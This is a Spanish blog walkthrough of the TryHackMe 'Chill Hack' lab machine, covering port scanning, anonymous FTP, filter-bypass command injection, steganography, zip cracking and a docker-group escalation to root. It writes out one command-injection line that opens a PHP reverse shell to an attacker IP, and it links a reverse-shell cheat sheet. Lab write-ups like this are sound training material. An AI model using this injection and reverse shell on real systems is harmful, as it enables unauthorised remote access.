TryHackMe/Chill Hack
- n3n3c0
- 17 feb 2022
- 2 Min. de lectura
Actualizado: 20 feb 2022
Chill Hack es una máquina de dificultad 'fácil' en la cual practicaremos y afianzaremos conocimientos involucrados en inyección de comandos, escalada de privilegios a través de scripts en bash/php a un usuario y puertos abiertos los cuales trabajaremos para llegar a archivos ocultos.
*Existen varias maneras de solucionar esta sala vulnerable, os enseñare el método por el cual conseguí completarla, pero siempre podréis investigar por vuestra cuenta y sacar vuestra conclusión.
*Todas las herramientas, protocolos e información considerada relevante tiene sus correspondientes enlaces, por si es necesario documentarse y profundizar.
Enlace a la sala: https://tryhackme.com/room/chillhack

¡Empecemos!
Empezaremos por realizar un escaneo de puerto con la herramienta NMAP.
Los puertos que nos muestra y que mas nos interesa para empezar a investigar son el 21(FTP), 22(SSH) y 80(HTTP).

Vemos que podemos iniciar sesión por FTP con el usuario anónimo (Anonymous).

Al entrar al servidor nos encontraos un archivo de texto.

Revisemos el puerto 80:
Podemos ver que contiene una pagina web.

Llevaré a cabo el lanzamiento de la herramienta Gobuster para buscar posibles directorios ocultos a simple vista.

Al visitar el directorio 'secret' tenemos un input que permite ejecutar comandos filtrados como decía la nota encontrada en el servidor FTP.

↓

Saltándonos el filtro crearemos una Reverse Shell en PHP a la máquina víctima dándonos acceso al usuario www-data.
Comando ejecutado
l\s | php -r '$sock=fsockopen("10.18.9.118",6969);exec("/bin/sh -i <&3 >&3 2>&3");'

*Reverse Shell Cheat Sheet: https://pentestmonkey.net/cheatsheet/shells/reverse-shell-cheat-sheet
Antes de seguir conviene hacer un tratamiento a la Shell.
Veamos que contenido podemos ejecutar con este usuario.

Una vez escalado privilegios buscaremos entre directorios que puede sernos útil.
Encuentro un archivo php el cual llama la atención "Hacker.php", su contenido nos otorga una pista.

Levantaré un servidor con python en la máquina victima que me permitirá acceder y descargar la imagen correspondiente.
Imagen

HTTP Python


* Python3 http.server :
https://developer.mozilla.org/es/docs/Learn/Common_questions/set_up_a_local_testing_server

Deduciremos con la pista otorgada anteriormente en el archivo hacker.php que hay algo escondido en la imagen, aplicaré esteganografía con la herramienta Steghide.

El archivo zip contiene contraseña, la cual con fuerza bruta crackearemos.
Para este paso utilizaré John The Ripper que contiene un módulo especial para archivos zip.


El zip descomprime un archivo PHP con una contraseña encriptada.
Archivo descomprimido


Con esta contraseña se buscará escalar privilegios a otro usuario.

Si nos fijamos este usuario (Anurodh) pertenece al grupo docker, llevaré a cabo una Shell de root con docker rompiendo las restricciones.

¡Final!
Legados a este punto hemos conseguido completar la máquina, solo quedaría sacar las flags de los usuarios que nos pide la plataforma TryHackMe.
Root

Usuario

¡Enhorabuena! Una mas o una menos. ( ͡° ͜ʖ ͡°)
Comments